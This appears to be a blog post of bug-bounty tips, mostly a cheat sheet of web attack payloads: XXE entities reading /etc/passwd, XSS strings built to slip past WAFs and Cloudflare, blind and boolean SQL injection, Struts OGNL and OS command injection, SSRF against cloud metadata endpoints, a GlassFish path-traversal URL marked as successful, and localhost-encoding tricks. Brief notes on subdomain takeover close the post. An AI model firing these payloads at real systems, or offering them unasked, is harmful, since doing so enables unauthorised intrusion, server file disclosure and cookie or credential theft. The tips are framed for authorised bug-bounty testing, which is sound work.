Bug Bounty Tips

XXE
-----------------

<!DOCTYPE foo [<!ENTITY xxe SYSTEM “Gkhck”> ]>

<!DOCTYPE foo [ 
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>              XXE&RCE
<foo>&xxe;</foo>                                                            

<!ENTITY body SYSTEM "file:///etc/passwd" >

XSS & WAF / CLOUDFLARE BYPASS
---------------------------------------------------

"'--!>'><img onerror=alert(1) src>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

<input onfocus=”alert(0);” autofocus> 

&lt;img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;

&lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;

<iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e">

<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>

javascript:”/*’/*`/* ?<html \” onmouseover=/*&lt;svg/*/onload=alert()//>

<iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e">  $$$CloudFlare

SQL INJECTION   & Blind
-----------------------
'-if(1=2,'0','1')-

/' 

%23'

1+or+if(mid(@@version,1,1)=5,1,2)=2%23'1+or+if(mid(@@version,1,1)=5,1,2)=2%23'

1'=sleep(10)='1 

--'

460-'''

id=460-4

1 ' or true# 

1 ' or false#

1 AND 1=(select 1 from PG_SLEEP(10)) — ‘ AND 1=(select 1 from PG_SLEEP(10)) OR ‘1’=’

'=IF(MID(VERSION(),1,1)=1,SLEEP(10),0)='1

'=IF(MID(VERSION(),1,1)=5,SLEEP(10),0)='1

action=show_support_breakups&brids=["')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/%23"]

(CASE SUBSTR((SELECT email FROM users WHERE username = 'jobertabma'), 1, 1) WHEN 'a' THEN (CASE id WHEN 429944 THEN 2 ELSE 1 END) ELSE 1 END)

%28CASE%20SUBSTR%28%28SELECT%20email%20FROM%20users%20WHERE%20username%20%3D%20%27jobertabma%27%29%2C%201%2C%201%29%20WHEN%20%27a%27%20THEN%20%28CASE%20id%20WHEN%20429944%20THEN%202%20ELSE%201%20END%29%20ELSE%201%20END%29

1111-sleep/*f*/(10)

uid-sleep(5)

Remote Code Execution
-----------------------------

</> ;+cat+/e'tc/pass'wd </>

Content-Type: %{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Ack-Th3g3nt3lman-POC’,4*4)}.multipart/form-data

</> c\\a\\t+/et\\c/pas\\swd </>

It’s possible to fire up “#OS #Command #Injection” instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\


Tips
--------

Jira : https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance

I searched for the GlassFish exploits and hopefully, I found a GET based exploit: “https://www.exploit-db.com/exploits/39241/”

Fail : https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Success : https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:4848/theme/META-INF%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd

1- don't stop when you see the response forbidden/not found on the target you are testing, run dirsearch or any tool you prefer to find endpoints.

if CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that. https://jsbin.com/werevijewa/edit?html,output

This basic URL returns a 200 status code. The input poc=35141008' returns a 500 error and poc=35141008'%23 does as well, but poc=35141008'' returns a 200 status. 
after this I tried a simple 35141008 OR 2 LIKE 2%23 which worked while 35141008 OR 2 LIKE 1%23 returned a 500 error, proving that boolean SQLi was possible here.


When a subdomain is vulnerable to a takeover, it will usually return a 404 error meaning that there is no content on the server for those who don't know if you find endpoints with .action, .do , .go that means the web application running struts2.

SSRF ByPass
----------------
127.0.0.1
127.0.1
127.1
127.000.000.001
2130706433
0x7F.0x00.0x00.0x01
0x7F.1
0x7F000001

Note that receiving 404 HTTP error does not mean the subdomain takeover is possible at all! As I said before, the services have dedicated VPS. For successful subdomain takeover, DNS request should always return NXDOMAIN. Given the pair of source and canonical domain names, if the base domain of a canonical domain name is available for registration, the source domain name is vulnerable to subdomain takeover.

Domain name (e.g., sub.example.com) uses a CNAME record to another domain (e.g., sub.example.com CNAME anotherdomain.com).At some point in time, anotherdomain.com expires and is available for registration by anyone.
Since the CNAME record is not deleted from example.com DNS zone, anyone who registers anotherdomain.com has full control over sub.example.com until the DNS record is present.
 If the base domain of canonical domain name of at least one NS record is available for registration, the source domain name is vulnerable to subdomain takeover.
A classic attack: /fetch?url=http://169.254.169.254/latest/meta-data/ 


=> I'll update...











Hiç yorum yok:

Yorum Gönder

Spring Boot Uygulamasını Heroku üzerinde Deploy Etme

Bu yazımızda sizlere spring boot ile yazılmış basit bir Rest api'nin heroku üzerinde nasıl deploy edebileceğimizi göstereceğim. Önce ...